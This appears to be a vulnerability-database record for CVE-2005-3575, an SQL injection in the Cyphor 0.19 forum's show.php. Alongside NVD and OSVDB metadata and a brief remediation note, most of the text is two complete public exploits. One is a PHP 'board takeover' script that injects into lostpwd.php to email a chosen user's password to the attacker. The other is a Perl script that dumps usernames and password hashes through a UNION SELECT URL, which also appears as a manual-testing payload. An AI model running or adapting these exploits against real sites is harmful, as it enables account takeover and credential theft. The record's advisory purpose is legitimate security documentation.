ID CVE-2005-3575
Type cve
Reporter cve@mitre.org
Modified 2011-03-08T02:26:00
Description
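SQL injection vulnerability in show.php in Cyphor 0.19 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter. The linked OSVDB entry (OSVDB:20983, dated 2005-11-13) attributes the flaw to show.php not properly sanitizing the user-supplied id value and lists no known upgrade, patch, or workaround. Remediation for a remaining installation therefore means validating id as an integer and binding it through a parameterized query, or retiring the application.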
{"id": "CVE-2005-3575", "bulletinFamily": "NVD", "title": "CVE-2005-3575", "description": "SQL injection vulnerability in show.php in Cyphor 0.19 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.", "published": "2005-11-16T07:42:00", "modified": "2011-03-08T02:26:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3575", "reporter": "cve@mitre.org", "references": ["http://www.securiteam.com/unixfocus/6P00F1FEKC.html", "http://www.vupen.com/english/advisories/2005/2420", "http://www.securityfocus.com/bid/15418", "http://securityreason.com/securityalert/180", "http://www.osvdb.org/20983", "http://www.securityfocus.com/archive/1/416562"], "cvelist": ["CVE-2005-3575"], "type": "cve", "lastseen": "2021-02-02T05:24:39", "edition": 6, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:20983"]}, {"type": "exploitdb", "idList": ["EDB-ID:1321", "EDB-ID:1241"]}], "modified": "2021-02-02T05:24:39", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-02-02T05:24:39", "rev": 2}, "vulnersScore": 7.4}, "cpe": ["cpe:/a:cynox:cyphor:0.19"], "affectedSoftware": [{"cpeName": "cynox:cyphor", "name": "cynox cyphor", "operator": "le", "version": "0.19"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:cynox:cyphor:0.19:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": 
[{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:cynox:cyphor:0.19:*:*:*:*:*:*:*", "versionEndIncluding": "0.19", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "180", "refsource": "SREASON", "tags": [], "url": "http://securityreason.com/securityalert/180"}, {"name": "ADV-2005-2420", "refsource": "VUPEN", "tags": [], "url": "http://www.vupen.com/english/advisories/2005/2420"}, {"name": "20983", "refsource": "OSVDB", "tags": [], "url": "http://www.osvdb.org/20983"}, {"name": "15418", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/15418"}, {"name": "http://www.securiteam.com/unixfocus/6P00F1FEKC.html", "refsource": "MISC", "tags": [], "url": "http://www.securiteam.com/unixfocus/6P00F1FEKC.html"}, {"name": "20051113 Cyphor (Release: 0.19) Sql injection", "refsource": "BUGTRAQ", "tags": ["Exploit"], "url": "http://www.securityfocus.com/archive/1/416562"}]}
{"osvdb": [{"lastseen": "2017-04-28T13:20:18", "bulletinFamily": "software", "cvelist": ["CVE-2005-3575"], "edition": 1, "description": "## Vulnerability Description\nCyphor contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the show.php script not properly sanitizing user-supplied input to the 'id' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nCyphor contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the show.php script not properly sanitizing user-supplied input to the 'id' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[target]/show.php?fid=2&id=-10%20union%20select%20id,null,null,null,null,nick,password,null,null,null%20from%20users%20where%20id=1\n## References:\nVendor URL: http://www.cynox.ch/cyphor/about.php\nOther Advisory URL: http://www.securiteam.com/unixfocus/6P00F1FEKC.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-11/0175.html\nFrSIRT Advisory: ADV-2005-2420\n[CVE-2005-3575](https://vulners.com/cve/CVE-2005-3575)\nBugtraq ID: 15418\n", "modified": "2005-11-13T11:41:53", "published": "2005-11-13T11:41:53", "href": "https://vulners.com/osvdb/OSVDB:20983", "id": "OSVDB:20983", "title": "Cyphor show.php id Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:50:30", "description": "Cyphor <= 0.19 (board takeover) SQL Injection Exploit. CVE-2005-3575. 
Webapps exploit for php platform", "published": "2005-10-08T00:00:00", "type": "exploitdb", "title": "Cyphor <= 0.19 board takeover SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3575"], "modified": "2005-10-08T00:00:00", "id": "EDB-ID:1241", "href": "https://www.exploit-db.com/exploits/1241/", "sourceData": "<?php\n# quoted from rgod \"1)if magic quotes off -> SQL Injection:\" /str0ke\n#\n# --- cyphor019_xpl.php 7.36 08/10/2005 #\n# #\n# Cyphor 0.19 ( possibly prior versions) SQL injection / board takeover #\n# #\n# by rgod #\n# site: http://rgod.altervista.org #\n# #\n# make these changes in php.ini if you have troubles #\n# to launch this script: #\n# allow_call_time_pass_reference = on #\n# register_globals = on #\n# #\n# usage: launch this script from Apache, fill requested fields, then #\n# send yourself any user / admin password right now! #\n# #\n# Sun Tzu: \"There are five ways of attacking with fire. The first is to burn #\n# soldiers in their camp; the second is to burn stores; the third is to burn #\n# baggage trains; the fourth is to burn arsenals and magazines; the fifth is #\n# to hurl dropping fire amongst the opponent.\" #\n\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\", 2);\nob_implicit_flush (1);\n\necho'<html><head><title>Cyphor 0.19 SQL Injection/board takeover </title><meta\nhttp-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\"> <style\ntype=\"text/css\"> body {\tbackground-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff;\nSCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img\n{background-color: #FFFFFF !important} input {background-color: #303030\n!important} option { background-color: #303030 !important} textarea\n{background-color: #303030 !important} input {color: #1CB081 !important} option\n{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox\n{background-color: #303030 !important} select {font-weight: normal; 
color:\n#1CB081; background-color: #303030;} body {font-size: 8pt !important;\nbackground-color: #111111; body * {font-size: 8pt !important} h1 {font-size:\n0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em\n!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em\n!important} \th2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em\n!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:\nnormal !important} *{text-decoration: none !important} a:link,a:active,a:visited\n{ text-decoration: none ; color : #1CBr81; } a:hover{text-decoration: underline;\ncolor : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;\nfont-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;\nfont-weight:bold; font-style: italic;}--></style></head><body><p class=\"Stile6\">\nCyphor 0.19 (possibly prior versions) SQL injection / board takeover </p><p\nclass=\"Stile6\"> a script by rgod at <a href=\"http://rgod.altervista.org\"\ntarget=\"_blank\"> http://rgod.altervista.org</a></p> <table width=\"84%\"><tr> <td\nwidth=\"43%\"><form name=\"form1\" method=\"post\" action=\"'.$SERVER[PHP_SELF].'?path=\nvalue&host=value&port=value&username=value&proxy=value&your_email=value\"> <p>\n<input type=\"text\" name=\"host\"><span class=\"Stile5\"> hostname (ex: www.sitename.\ncom)</span></p><p><input type=\"text\" name=\"path\"><span class=\"Stile5\"> path (ex:\n/cyphor/ or /forum/ or just /)</span></p><p><input type=\"text\" name=\"port\"><span\nclass=\"Stile5\"> specify a port other than 80 (default value)</span></p><p><input\ntype=\"text\" name=\"username\"><span class=\"Stile5\">user whom you want the password\n,admin? 
;) </span> </p> <p> <input type=\"text\" name=\"your_email\"><span\nclass=\"Stile5\"> email where the password will be sent</span> </p> <p> <input\ntype=\"text\" name=\"proxy\"><span class=\"Stile5\"> send exploit through an HTTP prox\ny (ip:port) </span></p><p><input type=\"submit\" name=\"Submit\" value=\"go!\"></p>\n</form></td></tr></table></body></html>';\n\nfunction show($headeri)\n{\n$ii=0;\n$ji=0;\n$ki=0;\n$ci=0;\necho '<table border=\"0\"><tr>';\nwhile ($ii <= strlen($headeri)-1)\n{\n$datai=dechex(ord($headeri[$ii]));\nif ($ji==16) {\n $ji=0;\n $ci++;\n echo \"<td> </td>\";\n for ($li=0; $li<=15; $li++)\n { echo \"<td>\".$headeri[$li+$ki].\"</td>\";\n\t\t\t }\n $ki=$ki+16;\n echo \"</tr><tr>\";\n }\nif (strlen($datai)==1) {echo \"<td>0\".$datai.\"</td>\";} else\n{echo \"<td>\".$datai.\"</td> \";}\n$ii++;\n$ji++;\n}\nfor ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)\n { echo \"<td>  </td>\";\n }\n\nfor ($li=$ci*16; $li<=strlen($headeri); $li++)\n { echo \"<td>\".$headeri[$li].\"</td>\";\n\t\t\t }\necho \"</tr></table>\";\n}\n\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\n\nfunction sendpacket($packet)\n{\nglobal $proxy, $host, $port, $html;\nif ($proxy=='')\n {$ock=fsockopen(gethostbyname($host),$port);\n if (!$ock) { echo 'No response from '.htmlentities($host).'...';\n\t\t\tdie;\n\t\t }}\n\n else\n {\n\t if (!eregi($proxy_regex,$proxy))\n\t {echo htmlentities($proxy).' -> not a valid proxy...';\n\t die;\n\t }\n\t $parts=explode(':',$proxy);\n\t echo 'Connecting to '.$parts[0].':'.$parts[1].' 
proxy...<br>';\n\t $ock=fsockopen($parts[0],$parts[1]);\n\t if (!$ock) { echo 'No response from proxy...';\n\t\t\tdie;\n\t\t }\n\t }\nfputs($ock,$packet);\nif ($proxy=='')\n {\n\n $html='';\n while (!feof($ock))\n {\n $html.=fgets($ock);\n }\n }\nelse\n {\n $html='';\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))\n {\n $html.=fread($ock,1);\n }\n }\nfclose($ock);\necho nl2br(htmlentities($html));\n}\n\ndefine('EMAIL_PREG', '#^[a-z0-9&\\-_.\\+]+?@[\\w\\-]+\\.([\\w\\-\\.]+\\.)?[\\w]+$#');\ndefine('USER_PREG', '#^[A-Za-z0-9_\\-]+$#');\n\nif (($path<>'') and ($host<>'') and ($your_email<>'') and ($username<>''))\n{\nif (!preg_match(EMAIL_PREG, $your_email)) {echo '<br>Need a valid email...'; die;}\nif (!preg_match(USER_PREG, $username)) {echo '<br>Need a valid username...'; die;}\n if ($port=='') {$port=80;}\n if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\n\n#STEP 1 -> retrieve the table prefix...\n$packet=\"GET \".$p.\"show.php?fid=' HTTP/1.0 \\r\\n\";\n$packet.=\"User-Agent: GetRight/4.5xx\\r\\n\";\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\n$packet.=\"Accept-Encoding: text/plain\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\nshow($packet);\nsendpacket($packet);\n\n$temp=explode(\"SELECT * FROM \",$html);\n$temp2=explode(\"forums WHERE\",$temp[1]);\n$table_prefix=trim($temp2[0]);\n\necho '<br> Table prefix ->'.htmlentities($table_prefix);\nif ($table_prefix=='') {echo 'Exploit failed...'; die;}\n\n#STEP 2 -> send yourself a new password...\n$sql=\"') UNION SELECT * FROM \".$table_prefix.\"users WHERE nick='\".$username.\"'/*\";\n$sql=urlencode($sql);\n$data=\"email=\".urlencode($your_email).\"&nick=\".$sql.\"&submit=Submit\";\n$packet=\"POST \".$p.\"lostpwd.php HTTP/1.1\\r\\n\";\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, 
application/msword, */*\\r\\n\";\n$packet.=\"Referer: http://\".$host.\":\".$port.$path.\"lostpwd.php\\r\\n\";\n$packet.=\"Accept-Language: it\\r\\n\";\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n$packet.=\"Accept-Encoding: gzip, deflate\\r\\n\";\n$packet.=\"User-Agent: Internet Ninja x.0\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n$packet.=\"Connection: Keep-Alive\\r\\n\";\n$packet.=\"Cache-Control: no-cache\\r\\n\\r\\n\";\n$packet.=$data;\nshow($packet);\nsendpacket($packet);\nif (eregi(\"New password sent.\",$html)) {echo '<br>Exploit successful...check your email box...';}\n\t\t\t\telse {echo '<br>Exploit failed...';}\n}\nelse\n{ echo 'Fill in requested fields, optionally specify a proxy...'; }\n?>\n\n# milw0rm.com [2005-10-08]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1241/"}, {"lastseen": "2016-01-31T13:59:49", "description": "Cyphor 0.19 (show.php id) Remote SQL Injection Exploit. CVE-2005-3575. Webapps exploit for php platform", "published": "2005-11-14T00:00:00", "type": "exploitdb", "title": "Cyphor 0.19 show.php id Remote SQL Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3575"], "modified": "2005-11-14T00:00:00", "id": "EDB-ID:1321", "href": "https://www.exploit-db.com/exploits/1321/", "sourceData": "#!/bin/env perl\n#//-----------------------------------------------------------#\n#// Cyphor Forum SQL Injection Exploit .. 
By HACKERS PAL\n#// Greets For Devil-00 - Abducter - Almaster\n#// http://WwW.SoQoR.NeT\n#//-----------------------------------------------------------#\n\nuse LWP::Simple;\n\nprint \"\\n#####################################################\";\nprint \"\\n# Cyphor Forum Exploit By : HACKERS PAL #\";\nprint \"\\n# Http://WwW.SoQoR.NeT #\";\nif(!$ARGV[0]||!$ARGV[1]) {\nprint \"\\n# -- Usage: #\";\nprint \"\\n# -- perl $0 [Full-Path] 1 #\";\nprint \"\\n# -- Example: #\";\nprint \"\\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1#\";\nprint \"\\n# Greets To Devil-00 - Abducter - almastar #\";\nprint \"\\n#####################################################\\n\";\n exit(0);\n} else {\nprint \"\\n# Greets To Devil-00 - Abducter - almastar #\";\nprint \"\\n#####################################################\\n\";\n\n $web=$ARGV[0];\n $id=$ARGV[1];\n\n$url = \"show.php?fid=2&id=-10%20union%20select%20id,2,3,4,5,nick,password,8,id,10%20from%20users%20where%20id=$id\";\n$site=\"$web/$url\";\n$page = get($site) || die \"[-] Unable to retrieve: $!\";\nprint \"\\n[+] Connected to: $ARGV[0]\\n\";\n\nprint \"[+] User ID is : $id \";\n$page =~ m/<span class=bigh>(.*?)<\\/span>/ && print \"\\n[+] User Name is: $1\\n\";\nprint \"\\n[-] Unable to retrieve User Name\\n\" if(!$1);\n$page =~ m/<span class=message>(.*?)<\\/span>/ && print \"[+] Hash of password is: $1\\n\";\nprint \"[-] Unable to retrieve hash of password\\n\" if(!$1);\n\n}\n\nprint \"\\n\\nGreets From HACKERS PAL To you :)\\nWwW.SoQoR.NeT . . . You Are Welcome\\n\\n\";\n\n# milw0rm.com [2005-11-14]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1321/"}]}